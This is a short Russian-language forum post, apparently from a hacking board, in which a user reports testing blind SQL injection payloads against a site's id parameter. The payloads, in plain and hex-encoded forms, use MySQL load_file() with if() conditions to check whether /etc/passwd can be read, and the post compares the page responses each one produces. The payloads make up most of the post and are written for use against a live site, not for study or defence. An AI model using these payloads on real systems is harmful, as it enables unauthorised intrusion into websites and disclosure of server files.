Показать сообщение отдельно

  #17  
Старый 11.08.2015, 16:12
3nvY
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами: 5753846

Репутация: 11
По умолчанию

При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1

а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.

То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+

и

and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+

просто под рукой сейчас нчего нет что в хекс кодирует строку)
 
Ответить с цитированием